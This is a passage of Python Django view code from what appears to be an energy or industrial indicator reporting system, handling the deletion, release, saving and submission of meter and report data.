all_data = getmodels(\"Entrydata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n target__adminapp_id=app, target__cycletype=cycletype,\n target__work=work,\n datadate=reporting_date)\n if operationtype == \"16\":\n all_data = getmodels(\"Extractdata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n target__adminapp_id=app,\n target__cycletype=cycletype,\n target__work=work,\n datadate=reporting_date)\n if operationtype == \"17\":\n all_data = getmodels(\"Calculatedata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n target__adminapp_id=app,\n target__cycletype=cycletype,\n target__work=work,\n datadate=reporting_date)\n\n if all_data:\n try:\n # 删除更新数据记录日志表中数据\n for i in all_data:\n UpdateDataLog.objects.exclude(state='9').filter(datadate=reporting_date,target_id=i.target_id).update(state='9')\n except Exception as e:\n pass\n try:\n all_data.update(**{'state': '9', 'releasestate': '0'})\n\n ReportingLog.objects.create(**{\n 'write_time': datetime.datetime.now(),\n 'datadate': reporting_date,\n 'cycletype': cycletype,\n 'operationtype': operationtype,\n 'adminapp_id': app,\n 'work': work,\n 'user_id': user_id,\n 'type': 'del',\n })\n except Exception as e:\n JsonResponse({\n 'status': 0,\n 'data': '删除失败。'\n })\n return JsonResponse(result)\n\n\ndef reporting_release(request):\n if request.user.is_authenticated():\n result = {\n 'status': 1,\n 'data': '发布成功。'\n }\n app = request.POST.get('app', '')\n savedata = request.POST.get('savedata')\n savedata = json.loads(savedata)\n cycletype = request.POST.get('cycletype', '')\n reporting_date = request.POST.get('reporting_date', '')\n funid = request.POST.get('funid', '')\n work = None\n user_id = request.user.id\n\n try:\n funid = int(funid)\n fun = Fun.objects.get(id=funid)\n work = fun.work\n app = int(app)\n except Exception as e:\n print(e)\n result['status'] = 0\n result['data'] = '网络异常。'\n else:\n try:\n reporting_date = getreporting_date(reporting_date, cycletype)\n except Exception as e:\n result['status'] = 0\n result['data'] = '报表时间处理异常。'\n else:\n # 分别存入数据库\n savedata1 = savedata['1']\n savedata15 = savedata['15']\n savedata16 = savedata['16']\n savedata17 = savedata['17']\n\n # 发布\n error_info = ''\n\n try:\n getmodels(\"Meterdata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n id__in=[int(x['id']) for x in savedata1]).update(releasestate='1')\n except Exception as e:\n error_info += '电表走字指标数据,'\n result['status'] = 0\n try:\n getmodels(\"Entrydata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n id__in=[int(x['id']) for x in savedata15]).update(releasestate='1')\n except Exception as e:\n error_info += '数据录入指标数据,'\n result['status'] = 0\n try:\n getmodels(\"Extractdata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n id__in=[int(x['id']) for x in savedata16]).update(releasestate='1')\n except Exception as e:\n error_info += '数据提取指标数据,'\n result['status'] = 0\n try:\n getmodels(\"Calculatedata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n id__in=[int(x['id']) for x in savedata17]).update(releasestate='1')\n except Exception as e:\n error_info += '数据计算指标数据'\n result['status'] = 0\n\n if result['status']:\n ReportingLog.objects.create(**{\n 'write_time': datetime.datetime.now(),\n 'datadate': reporting_date,\n 'cycletype': cycletype,\n 'adminapp_id': app,\n 'work': work,\n 'user_id': user_id,\n 'type': 'release',\n })\n\n # 以下为发布数据,修改更改数据的原始数据\n try:\n update_obj = UpdateDataLog.objects.exclude(state='9').filter(datadate=reporting_date)\n if update_obj.exists():\n for i in update_obj:\n obj = update_obj.filter(id=i.id)\n obj.update(raw_curvalue=obj[0].after_curvalue)\n except Exception as e:\n pass\n else:\n result['data'] = '{0}发布失败。'.format(error_info[:-1] if error_info.endswith(',') else error_info)\n\n return JsonResponse(result)\n\n\ndef reporting_cancel_release(request):\n if request.user.is_authenticated():\n result = {\n 'status': 1,\n 'data': '取消成功。'\n }\n app = request.POST.get('app', '')\n savedata = request.POST.get('savedata')\n savedata = json.loads(savedata)\n cycletype = request.POST.get('cycletype', '')\n reporting_date = request.POST.get('reporting_date', '')\n funid = request.POST.get('funid', '')\n work = None\n user_id = request.user.id\n\n try:\n funid = int(funid)\n fun = Fun.objects.get(id=funid)\n work = fun.work\n app = int(app)\n except Exception as e:\n print(e)\n result['status'] = 0\n result['data'] = '网络异常。'\n else:\n try:\n reporting_date = getreporting_date(reporting_date, cycletype)\n except Exception as e:\n result['status'] = 0\n result['data'] = '报表时间处理异常。'\n else:\n # 分别存入数据库\n savedata1 = savedata['1']\n savedata15 = savedata['15']\n savedata16 = savedata['16']\n savedata17 = savedata['17']\n\n # 发布\n error_info = ''\n\n try:\n getmodels(\"Meterdata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n id__in=[int(x['id']) for x in savedata1]).update(releasestate='0')\n except Exception as e:\n error_info += '电表走字指标数据,'\n result['status'] = 0\n try:\n getmodels(\"Entrydata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n id__in=[int(x['id']) for x in savedata15]).update(releasestate='0')\n except Exception as e:\n error_info += '数据录入指标数据,'\n result['status'] = 0\n try:\n getmodels(\"Extractdata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n id__in=[int(x['id']) for x in savedata16]).update(releasestate='0')\n except Exception as e:\n error_info += '数据提取指标数据,'\n result['status'] = 0\n try:\n getmodels(\"Calculatedata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n id__in=[int(x['id']) for x in savedata17]).update(releasestate='0')\n except Exception as e:\n error_info += '数据计算指标数据'\n result['status'] = 0\n\n if result['status']:\n ReportingLog.objects.create(**{\n 'write_time': datetime.datetime.now(),\n 'datadate': reporting_date,\n 'cycletype': cycletype,\n 'adminapp_id': app,\n 'work': work,\n 'user_id': user_id,\n 'type': 'cancelrelease',\n })\n else:\n result['data'] = '{0}取消失败。'.format(error_info[:-1] if error_info.endswith(',') else error_info)\n\n return JsonResponse(result)\n\n\ndef reporting_save(request):\n if request.user.is_authenticated():\n ret = {\n 'status': 1,\n 'data': '保存成功。'\n }\n savedata = request.POST.get('savedata')\n operationtype = request.POST.get('operationtype')\n cycletype = request.POST.get('cycletype', '')\n savedata = json.loads(savedata)\n reporting_date = request.POST.get('reporting_date', '')\n\n app = request.POST.get('app', '')\n funid = request.POST.get('funid', '')\n\n try:\n funid = int(funid)\n fun = Fun.objects.get(id=funid)\n work = fun.work\n app = int(app)\n except Exception as e:\n return JsonResponse({\n 'status': 0,\n 'data': str(e)\n })\n try:\n reporting_date = getreporting_date(reporting_date, cycletype)\n except:\n return JsonResponse({\n 'status': 0,\n 'data': '日期处理异常。'\n })\n\n # add\n tableyear = str(reporting_date.year)\n\n EntryTable = getmodels(\"Entrydata\", tableyear)\n MeterTable = getmodels(\"Meterdata\", tableyear)\n ExtractTable = getmodels(\"Extractdata\", tableyear)\n CalculateTable = getmodels(\"Calculatedata\", tableyear)\n tableList = {\"Entrydata\": EntryTable, \"Meterdata\": MeterTable, \"Extractdata\": ExtractTable,\n \"Calculatedata\": CalculateTable}\n\n save_query_data = []\n meterchangedata = []\n # 循环前执行所有查询,所有需要存储的键值存储在{}中,直接执行queryset(id=?).update(**kwargs)\n # 相比get(),save(),减少查询的操作,直接更新\n if operationtype == \"1\":\n save_query_data = getmodels(\"Meterdata\", str(reporting_date.year)).objects.exclude(state=\"9\").values(\n 'zerodata', 'twentyfourdata', 'metervalue', 'target__magnification', 'todayvalue', 'judgevalue',\n 'curvalue', 'target__digit', 'target__datatype', 'curvaluedate', 'curvaluetext', 'cumulativemonth',\n 'cumulativequarter',\n 'cumulativehalfyear', 'cumulativeyear', 'id', 'releasestate'\n )\n if operationtype == \"15\":\n save_query_data = getmodels(\"Entrydata\", str(reporting_date.year)).objects.exclude(state=\"9\").values(\n 'todayvalue', 'judgevalue',\n 'curvalue', 'target__digit', 'target__datatype', 'curvaluedate', 'curvaluetext', 'cumulativemonth',\n 'cumulativequarter',\n 'cumulativehalfyear', 'cumulativeyear', 'id', 'releasestate'\n )\n if operationtype == \"16\":\n save_query_data = getmodels(\"Extractdata\", str(reporting_date.year)).objects.exclude(state=\"9\").values(\n 'todayvalue', 'judgevalue',\n 'curvalue', 'target__digit', 'target__datatype', 'curvaluedate', 'curvaluetext', 'cumulativemonth',\n 'cumulativequarter',\n 'cumulativehalfyear', 'cumulativeyear', 'id', 'releasestate'\n )\n if operationtype == \"17\":\n save_query_data = getmodels(\"Calculatedata\", str(reporting_date.year)).objects.exclude(state=\"9\").values(\n 'todayvalue', 'judgevalue',\n 'curvalue', 'target__digit', 'target__datatype', 'curvaluedate', 'curvaluetext', 'cumulativemonth',\n 'cumulativequarter',\n 'cumulativehalfyear', 'cumulativeyear', 'id', 'releasestate'\n )\n\n for curdata in savedata:\n result = dict()\n\n # save to dict\n single_save_query_data = {}\n for sqd in save_query_data:\n if sqd['id'] == curdata['id']:\n single_save_query_data = sqd\n break\n if single_save_query_data:\n if single_save_query_data['target__datatype'] == 'numbervalue':\n before_curvalue = float(single_save_query_data['curvalue'])\n after_curvalue = float(curdata[\"curvalue\"])\n # 更改了数据,记录数据\n try:\n if single_save_query_data['releasestate'] == '0':\n if before_curvalue != after_curvalue:\n before_curvalue = decimal.Decimal(str(before_curvalue)).quantize(decimal.Decimal(Digit(single_save_query_data['target__digit'])), rounding=decimal.ROUND_HALF_UP)\n after_curvalue = decimal.Decimal(str(after_curvalue)).\\\n quantize(decimal.Decimal(Digit(single_save_query_data['target__digit'])), rounding=decimal.ROUND_HALF_UP)\n\n update_obj = UpdateDataLog.objects.exclude(state='9').filter(datadate=reporting_date, target_id=curdata['target_id'])\n if update_obj.exists():\n update_obj.update(**{\n 'write_time': datetime.datetime.now(),\n 'before_curvalue': update_obj[0].raw_curvalue,\n 'after_curvalue': after_curvalue,\n })\n else:\n update_obj.create(**{\n 'cycletype': cycletype,\n 'operationtype': operationtype,\n 'datadate': reporting_date,\n 'write_time': datetime.datetime.now(),\n 'before_curvalue': before_curvalue,\n 'after_curvalue': after_curvalue,\n 'target_id': curdata['target_id'],\n 'adminapp_id': app,\n 'work': work,\n 'user_id': request.user.id,\n 'raw_curvalue': before_curvalue,\n })\n except Exception as e:\n print(e)\n try:\n result['todayvalue'] = float(curdata[\"todayvalue\"])\n result['todayvalue'] = decimal.Decimal(str(curdata['todayvalue'])).quantize(\n decimal.Decimal(Digit(single_save_query_data['target__digit'])),\n rounding=decimal.ROUND_HALF_UP)\n except Exception as e:\n pass\n try:\n result['judgevalue'] = float(curdata[\"judgevalue\"])\n result['judgevalue'] = decimal.Decimal(str(curdata['judgevalue'])).quantize(\n decimal.Decimal(Digit(single_save_query_data['target__digit'])),\n rounding=decimal.ROUND_HALF_UP)\n except Exception as e:\n pass\n try:\n result['curvalue'] = float(curdata[\"curvalue\"])\n result['curvalue'] = decimal.Decimal(str(curdata['curvalue'])).quantize(\n decimal.Decimal(Digit(single_save_query_data['target__digit'])),\n rounding=decimal.ROUND_HALF_UP)\n except Exception as e:\n pass\n if single_save_query_data['target__datatype'] == 'date':\n try:\n result['curvaluedate'] = datetime.datetime.strptime(curdata[\"curvaluedate\"],\n \"%Y-%m-%d %H:%M:%S\")\n except Exception as e:\n pass\n if single_save_query_data['target__datatype'] == 'text':\n try:\n result['curvaluetext'] = curdata[\"curvaluetext\"]\n except Exception as e:\n pass\n try:\n result['zerodata'] = curdata[\"zerodata\"]\n except Exception as e:\n pass\n try:\n result['twentyfourdata'] = curdata[\"twentyfourdata\"]\n except Exception as e:\n pass\n try:\n result['metervalue'] = curdata[\"metervalue\"]\n except Exception as e:\n pass\n try:\n result['cumulativemonth'] = float(curdata[\"cumulativemonth\"])\n result['cumulativemonth'] = round(curdata['cumulativemonth'],\n single_save_query_data['target__digit'])\n except Exception as e:\n pass\n try:\n result['cumulativequarter'] = float(curdata[\"cumulativequarter\"])\n result['cumulativequarter'] = round(curdata['cumulativequarter'],\n single_save_query_data['target__digit'])\n except Exception as e:\n pass\n try:\n result['cumulativehalfyear'] = float(curdata[\"cumulativehalfyear\"])\n result['cumulativehalfyear'] = round(curdata['cumulativehalfyear'],\n save_query_data['target__digit'])\n except Exception as e:\n pass\n try:\n result['cumulativeyear'] = float(curdata[\"cumulativeyear\"])\n result['cumulativeyear'] = round(curdata['cumulativeyear'], save_query_data['target__digit'])\n except Exception as e:\n pass\n\n if operationtype == \"1\":\n getmodels(\"Meterdata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n id=single_save_query_data['id']).update(**result)\n\n # 电表走字换新表\n if curdata[\"finalvalue\"]:\n # 倍率发生变化后修改\n try:\n newmagnification = float(curdata[\"magnification\"])\n if single_save_query_data['target__magnification'] != newmagnification:\n try:\n tmp_metedata = getmodels(\"Meterdata\", str(reporting_date.year)).objects.exclude(\n state=\"9\").get(id=single_save_query_data['id'])\n except Exception as e:\n pass\n else:\n if tmp_metedata.target:\n tmp_metedata.target.magnification = newmagnification\n tmp_metedata.target.save()\n except:\n pass\n\n meterchange_result = dict()\n\n reporting_date = datetime.datetime.strptime(curdata[\"reporting_date\"], \"%Y-%m-%d\")\n try:\n meterchange_result['datadate'] = reporting_date\n except:\n pass\n try:\n meterchange_result['meterdata'] = single_save_query_data['id']\n except:\n pass\n try:\n # meterchange_result['oldtable_zerodata'] = float(curdata[\"oldtable_zerodata\"])\n meterchange_result['oldtable_zerodata'] = decimal.Decimal(\n str(float(curdata[\"oldtable_zerodata\"])))\n except:\n pass\n try:\n # meterchange_result['oldtable_twentyfourdata'] = float(curdata[\"oldtable_twentyfourdata\"])\n meterchange_result['oldtable_twentyfourdata'] = decimal.Decimal(\n str(float(curdata[\"oldtable_twentyfourdata\"])))\n except:\n pass\n try:\n # meterchange_result['oldtable_value'] = float(curdata[\"oldtable_value\"])\n meterchange_result['oldtable_value'] = decimal.Decimal(\n str(float(curdata[\"oldtable_value\"])))\n except:\n pass\n try:\n # meterchange_result['oldtable_magnification'] = float(curdata[\"oldtable_magnification\"])\n meterchange_result['oldtable_magnification'] = decimal.Decimal(\n str(float(curdata[\"oldtable_magnification\"])))\n except:\n pass\n try:\n # meterchange_result['oldtable_finalvalue'] = float(curdata[\"oldtable_finalvalue\"])\n meterchange_result['oldtable_finalvalue'] = decimal.Decimal(\n str(float(curdata[\"oldtable_finalvalue\"])))\n except:\n pass\n try:\n # meterchange_result['newtable_zerodata'] = float(curdata[\"newtable_zerodata\"])\n meterchange_result['newtable_zerodata'] = decimal.Decimal(\n str(float(curdata[\"newtable_zerodata\"])))\n except:\n pass\n try:\n # meterchange_result['newtable_twentyfourdata'] = float(curdata[\"newtable_twentyfourdata\"])\n meterchange_result['newtable_twentyfourdata'] = decimal.Decimal(\n str(float(curdata[\"newtable_twentyfourdata\"])))\n except:\n pass\n try:\n # meterchange_result['newtable_value'] = float(curdata[\"newtable_value\"])\n meterchange_result['newtable_value'] = decimal.Decimal(\n str(float(curdata[\"newtable_value\"])))\n except:\n pass\n try:\n # meterchange_result['newtable_magnification'] = float(curdata[\"newtable_magnification\"])\n meterchange_result['newtable_magnification'] = decimal.Decimal(\n str(float(curdata[\"newtable_magnification\"])))\n except:\n pass\n try:\n # meterchange_result['newtable_finalvalue'] = float(curdata[\"newtable_finalvalue\"])\n meterchange_result['newtable_finalvalue'] = decimal.Decimal(\n str(float(curdata[\"newtable_finalvalue\"])))\n except:\n pass\n try:\n # meterchange_result['finalvalue'] = float(curdata[\"finalvalue\"])\n meterchange_result['finalvalue'] = decimal.Decimal(str(float(curdata[\"finalvalue\"])))\n except:\n pass\n\n mcd = Meterchangedata.objects.exclude(state=\"9\").filter(meterdata=single_save_query_data['id'])\n if mcd.exists():\n mcd.update(**meterchange_result)\n else:\n mcd.create(**meterchange_result)\n\n if operationtype == \"15\":\n getmodels(\"Entrydata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n id=single_save_query_data['id']).update(**result)\n if operationtype == \"16\":\n getmodels(\"Extractdata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n id=single_save_query_data['id']).update(**result)\n if operationtype == \"17\":\n getmodels(\"Calculatedata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n id=single_save_query_data['id']).update(**result)\n # 保存时,重新累计\n try:\n target = Target.objects.get(id=int(curdata['target_id']))\n if target.cumulative in ['1', '2', '3', '4', '5']:\n cumulative = getcumulative(tableList, target, reporting_date, decimal.Decimal(str(curdata[\"curvalue\"])))\n operation_type = target.operationtype\n table_name = map_operation(operation_type)\n table_model = getmodels(table_name, str(reporting_date.year))\n td_data = table_model.objects.filter(target=target).filter(datadate=reporting_date).exclude(state=\"9\").last()\n td_data.cumulativemonth = cumulative[\"cumulativemonth\"]\n td_data.cumulativequarter = cumulative[\"cumulativequarter\"]\n td_data.cumulativehalfyear = cumulative[\"cumulativehalfyear\"]\n td_data.cumulativeyear = cumulative[\"cumulativeyear\"]\n td_data.save()\n except Exception as e:\n print(e)\n else:\n pass\n\n return JsonResponse(ret)\n\n\ndef report_submit_index(request, funid):\n \"\"\"\n 报表上报\n \"\"\"\n if request.user.is_authenticated():\n errors = []\n id = \"\"\n report_type_list = []\n report_type = \"\"\n adminapp = \"\"\n try:\n cur_fun = Fun.objects.filter(id=int(funid)).exclude(state='9')\n adminapp = cur_fun[0].app_id\n except:\n return HttpResponseRedirect(\"/index\")\n\n # 下拉框选项\n # 查看该应用有报表的类型\n report_types = ReportModel.objects.exclude(state=\"9\").order_by(\"sort\").filter(app_id=adminapp).values(\n \"report_type\"\n )\n all_report_types = [rt[\"report_type\"] for rt in report_types]\n\n c_dict_index_1 = DictIndex.objects.filter(\n id=7).exclude(state='9')\n if c_dict_index_1.exists():\n c_dict_index_1 = c_dict_index_1[0]\n dict_list1 = c_dict_index_1.dictlist_set.exclude(state=\"9\")\n for i in dict_list1:\n if str(i.id) in all_report_types:\n report_type_list.append({\n \"report_name\": i.name,\n \"report_type_id\": i.id,\n })\n\n if not report_type:\n report_type = i.id\n all_app = App.objects.exclude(state=\"9\")\n all_app_list = []\n for app in all_app:\n all_app_list.append({\n \"app_id\": app.id,\n \"app_name\": app.name,\n })\n\n # datetimepicker\n date1 = datetime.datetime.now().replace(hour=0, minute=0, second=0, microsecond=0) + datetime.timedelta(\n days=-1)\n date2 = (datetime.datetime.now().replace(day=1, hour=0, minute=0, second=0, microsecond=0) + datetime.timedelta(\n days=-1)).replace(day=1)\n\n date3 = \"\"\n seasondate = \"\"\n now = datetime.datetime.now()\n month = (now.month - 1) - (now.month - 1) % 3 + 1\n now = (datetime.datetime.now().replace(month=month, day=1, hour=0, minute=0, second=0,\n microsecond=0) + datetime.timedelta(days=-1))\n year = now.strftime(\"%Y\")\n if now.month in (1, 2, 3):\n season = '第1季度'\n seasondate = year + '-' + season\n date3 = year + '-' + \"03-31\"\n if now.month in (4, 5, 6):\n season = '第2季度'\n seasondate = year + '-' + season\n date3 = year + '-' + \"06-30\"\n if now.month in (7, 8, 9):\n season = '第3季度'\n seasondate = year + '-' + season\n date3 = year + '-' + \"09-30\"\n if now.month in (10, 11, 12):\n season = '第4季度'\n seasondate = year + '-' + season\n date3 = year + '-' + \"12-31\"\n\n date4 = \"\"\n yeardate = \"\"\n now = datetime.datetime.now()\n month = (now.month - 1) - (now.month - 1) % 6 + 1\n now = (datetime.datetime.now().replace(month=month, day=1, hour=0, minute=0, second=0,\n microsecond=0) + datetime.timedelta(days=-1))\n year = now.strftime(\"%Y\")\n if now.month in (1, 2, 3, 4, 5, 6):\n season = '上半年'\n yeardate = year + '-' + season\n date4 = year + '-' + \"06-30\"\n if now.month in (7, 8, 9, 10, 11, 12):\n season = '下半年'\n yeardate = year + '-' + season\n date4 = year + '-' + \"12-31\"\n\n date5 = (datetime.datetime.now().replace(month=1, day=1, hour=0, minute=0, second=0,\n microsecond=0) + datetime.timedelta(days=-1)).replace(month=1, day=1)\n\n temp_dict = {\n \"22\": date1.strftime(\"%Y-%m-%d\"),\n \"23\": date2.strftime(\"%Y-%m\"),\n \"24\": date3,\n \"25\": date4,\n \"26\": date5.strftime(\"%Y\"),\n }\n return render(request, 'report_submit.html',\n {'username': request.user.userinfo.fullname,\n \"selected_report_type\": report_type,\n \"report_type_list\": report_type_list,\n \"all_app_list\": all_app_list,\n \"errors\": errors,\n \"id\": id,\n \"date\": json.dumps(temp_dict),\n \"dateday\": date1.strftime(\"%Y-%m-%d\"),\n \"seasondate\": seasondate,\n \"yeardate\": yeardate,\n \"adminapp\": adminapp,\n \"funid\": funid,\n \"pagefuns\": getpagefuns(funid,request)})\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef report_submit_data(request):\n if request.user.is_authenticated():\n result = []\n search_app = request.GET.get('search_app', '')\n search_date = request.GET.get('search_date', '')\n search_report_type = request.GET.get('search_report_type', '')\n\n # 时间的过滤\n if search_date:\n if search_report_type == \"22\":\n search_date = datetime.datetime.strptime(search_date, \"%Y-%m-%d\")\n elif search_report_type == \"23\":\n search_date = datetime.datetime.strptime(search_date, \"%Y-%m\")\n year = search_date.year\n month = search_date.month\n a, b = calendar.monthrange(year, month)\n search_date = datetime.datetime(year=year, month=month, day=b)\n elif search_report_type == \"24\":\n search_date = search_date\n elif search_report_type == \"25\":\n search_date = search_date\n elif search_report_type == \"26\":\n search_date = datetime.datetime.strptime(search_date, \"%Y\")\n search_date = search_date.replace(month=12, day=31)\n else:\n pass\n\n all_report = ReportModel.objects.exclude(state=\"9\").order_by(\"sort\").filter(report_type=search_report_type)\n curadminapp = App.objects.get(id=int(search_app))\n all_report = all_report.filter(app=curadminapp)\n\n # 报表服务器地址\n rs = ReportServer.objects.first()\n report_server = rs.report_server if rs else ''\n\n for report in all_report:\n # 报表类型\n report_type = report.report_type\n report_time = ''\n try:\n report_type_dict_list = DictList.objects.filter(id=int(report.report_type))\n if report_type_dict_list.exists():\n report_type_dict_list = report_type_dict_list[0]\n report_type = report_type_dict_list.name\n except:\n pass\n\n report_info_list = []\n\n current_report_info_set = report.reportinfo_set.exclude(state=\"9\")\n if current_report_info_set.exists():\n for report_info in current_report_info_set:\n report_info_list.append({\n \"report_info_name\": report_info.name,\n \"report_info_value\": report_info.default_value,\n \"report_info_id\": int(report_info.id),\n })\n\n # state判断 report_time/state==1\n report_submit_1 = report.reportsubmit_set.exclude(state=\"9\").filter(report_time=search_date, state=\"1\")\n report_submit_0 = report.reportsubmit_set.exclude(state=\"9\").filter(report_time=search_date, state=\"0\")\n\n if report_submit_1.exists():\n state = \"已发布\"\n person = report_submit_1[0].person\n write_time = report_submit_1[0].write_time.strftime('%Y-%m-%d')\n\n c_report_time = report_submit_1[0].report_time\n # 年 月 日 2019-01-01\n if c_report_time:\n if report_type == \"年报\":\n report_time = c_report_time.strftime('%Y')\n if report_type in [\"半年报\", \"季报\", \"日报\"]:\n report_time = c_report_time.strftime('%Y-%m-%d')\n if report_type == \"月报\":\n report_time = c_report_time.strftime('%Y-%m')\n c_report_info_list = []\n current_report_submit_info_set = report_submit_1[0].reportsubmitinfo_set.exclude(state=\"9\")\n for report_submit_info in current_report_submit_info_set:\n c_report_info_list.append({\n \"report_info_name\": report_submit_info.name,\n \"report_info_value\": report_submit_info.value,\n \"report_info_id\": int(report_submit_info.id),\n })\n report_info_list = c_report_info_list\n elif report_submit_0.exists():\n state = \"未发布\"\n person = report_submit_0[0].person\n write_time = report_submit_0[0].write_time.strftime('%Y-%m-%d')\n c_report_time = report_submit_0[0].report_time\n if c_report_time:\n if report_type == \"年报\":\n report_time = c_report_time.strftime('%Y')\n if report_type in [\"半年报\", \"季报\", \"日报\"]:\n report_time = c_report_time.strftime('%Y-%m-%d')\n if report_type == \"月报\":\n report_time = c_report_time.strftime('%Y-%m')\n c_report_info_list = []\n current_report_submit_info_set = report_submit_0[0].reportsubmitinfo_set.exclude(state=\"9\")\n for report_submit_info in current_report_submit_info_set:\n c_report_info_list.append({\n \"report_info_name\": report_submit_info.name,\n \"report_info_value\": report_submit_info.value,\n \"report_info_id\": int(report_submit_info.id),\n })\n report_info_list = c_report_info_list\n else:\n state = \"未创建\"\n person = str(request.user.userinfo.fullname) if request.user.userinfo else ''\n write_time = datetime.datetime.now().strftime('%Y-%m-%d')\n report_time = \"\"\n\n result.append({\n \"id\": report.id,\n \"name\": report.name,\n \"code\": report.code,\n \"file_name\": report.file_name,\n \"relative_file_name\": report.app.code + '/' + report.file_name,\n \"report_type\": report_type,\n \"report_type_id\": int(report.report_type) if report.report_type else \"\",\n \"app\": report.app.name,\n \"app_id\": report.app.id,\n \"report_type_num\": report.report_type,\n \"sort\": report.sort,\n \"report_info_list\": report_info_list,\n \"person\": person,\n \"write_time\": write_time,\n \"state\": state,\n \"report_time\": report_time,\n \"report_server\": report_server\n })\n return JsonResponse({\"data\": result})\n\n\ndef report_submit_save(request):\n if request.user.is_authenticated():\n # 新增/修改报表模型\n if request.method == \"POST\":\n result = {}\n person = request.POST.get(\"person\", \"\")\n write_time = request.POST.get(\"write_time\", \"\")\n report_model = request.POST.get(\"report_model\", \"\")\n app = request.POST.get(\"app\", \"\")\n post_type = request.POST.get(\"post_type\", \"\")\n report_time = request.POST.get(\"report_time\", \"\")\n\n write_time = datetime.datetime.strptime(write_time, \"%Y-%m-%d\") if write_time else None\n length_tag = report_time.count(\"-\")\n if length_tag == 0:\n report_time = datetime.datetime.strptime(report_time, \"%Y\") if report_time else None\n report_time = report_time.replace(month=12, day=31) if report_time else None\n elif length_tag == 1:\n report_time = datetime.datetime.strptime(report_time, \"%Y-%m\") if report_time else None\n a, b = calendar.monthrange(report_time.year, report_time.month) if report_time else None\n report_time = datetime.datetime(year=report_time.year, month=report_time.month,\n day=b) if report_time else None\n elif length_tag == 2:\n report_time = datetime.datetime.strptime(report_time, \"%Y-%m-%d\") if report_time else None\n else:\n result[\"res\"] = \"网络异常。\"\n return JsonResponse(result)\n\n report_info_num = 0\n for key in request.POST.keys():\n if \"report_info_\" in key:\n report_info_num += 1\n\n if report_model:\n report_model = int(report_model)\n\n current_report_submit = ReportSubmit.objects.exclude(state=\"9\").filter(report_model_id=report_model,\n report_time=report_time)\n # 新增\n if not current_report_submit.exists():\n try:\n report_submit_add = ReportSubmit()\n report_submit_add.report_model_id = report_model\n report_submit_add.app_id = app\n report_submit_add.person = person\n report_submit_add.state = \"0\"\n report_submit_add.write_time = write_time\n report_submit_add.report_time = report_time\n if post_type == \"submit\":\n report_submit_add.state = \"1\"\n report_submit_add.save()\n\n # report_info\n if report_info_num:\n range_num = int(report_info_num / 3)\n for i in range(0, range_num):\n report_submit_info = ReportSubmitInfo()\n report_info_name = request.POST.get(\n \"report_info_name_%d\" % (i + 1), \"\")\n report_info_default_value = request.POST.get(\n \"report_info_value_%d\" % (i + 1), \"\")\n if report_info_name:\n report_submit_info.name = report_info_name\n report_submit_info.value = report_info_default_value\n report_submit_info.report_submit = report_submit_add\n report_submit_info.save()\n result[\"res\"] = \"保存成功。\"\n except Exception as e:\n result[\"res\"] = \"网络异常。\"\n return JsonResponse(result)\n # 修改\n else:\n current_report_submit = current_report_submit[0]\n try:\n if post_type == \"submit\":\n current_report_submit.state = \"1\"\n current_report_submit.person = person\n current_report_submit.write_time = write_time\n current_report_submit.report_time = report_time\n current_report_submit.save()\n if report_info_num:\n range_num = int(report_info_num / 3)\n for i in range(0, range_num):\n report_info_id = request.POST.get(\n \"report_info_id_%d\" % (i + 1), \"\")\n report_info_name = request.POST.get(\n \"report_info_name_%d\" % (i + 1), \"\")\n report_info_value = request.POST.get(\n \"report_info_value_%d\" % (i + 1), \"\")\n temp_report_submit_info = ReportSubmitInfo.objects.exclude(state=\"9\").filter(\n id=int(report_info_id))\n if temp_report_submit_info.exists():\n temp_report_submit_info = temp_report_submit_info[0]\n temp_report_submit_info.name = report_info_name\n temp_report_submit_info.value = report_info_value\n temp_report_submit_info.save()\n result[\"res\"] = \"保存成功。\"\n except Exception as e:\n result[\"res\"] = \"网络异常。\"\n return JsonResponse(result)\n else:\n result[\"res\"] = \"网络异常。\"\n return JsonResponse(result)\n\n\ndef report_submit_all_tmp(request):\n if request.user.is_authenticated():\n # 新增报表模型\n if request.method == \"POST\":\n result = {}\n user_id = int(request.user.id)\n app = request.POST.get(\"app\", \"\")\n report_time = request.POST.get(\"report_time\", \"\")\n person = UserInfo.objects.exclude(state=\"9\").get(user_id=user_id).fullname\n write_time = request.POST.get(\"write_time\", \"\")\n write_time = datetime.datetime.strptime(write_time, \"%Y-%m-%d\") if write_time else None\n length_tag = report_time.count(\"-\")\n if length_tag == 0:\n report_time = datetime.datetime.strptime(report_time, \"%Y\") if report_time else None\n report_time = report_time.replace(month=12, day=31) if report_time else None\n elif length_tag == 1:\n report_time = datetime.datetime.strptime(report_time, \"%Y-%m\") if report_time else None\n a, b = calendar.monthrange(report_time.year, report_time.month) if report_time else None\n report_time = datetime.datetime(year=report_time.year, month=report_time.month,\n day=b) if report_time else None\n elif length_tag == 2:\n report_time = datetime.datetime.strptime(report_time, \"%Y-%m-%d\") if report_time else None\n else:\n result[\"res\"] = \"网络异常。\"\n return JsonResponse(result)\n report_model_list = request.POST.get(\"report_model_list\", \"\")\n report_model_list = json.loads(report_model_list)\n if report_model_list:\n for report_model_id in report_model_list:\n report_model = int(report_model_id)\n current_report_submit = ReportSubmit.objects.exclude(state=\"9\").filter(\n report_model_id=report_model, report_time=report_time)\n # 新增\n if not current_report_submit.exists():\n try:\n report_submit_add = ReportSubmit()\n report_submit_add.report_model_id = report_model\n report_submit_add.app_id = app\n report_submit_add.person = person\n report_submit_add.state = \"0\"\n report_submit_add.write_time = write_time\n report_submit_add.report_time = report_time\n report_submit_add.state = \"1\"\n report_submit_add.save()\n report_info = ReportInfo.objects.exclude(state=\"9\").filter(report_model_id=report_model)\n if report_info.exists():\n for i in report_info:\n report_submit_info = ReportSubmitInfo()\n 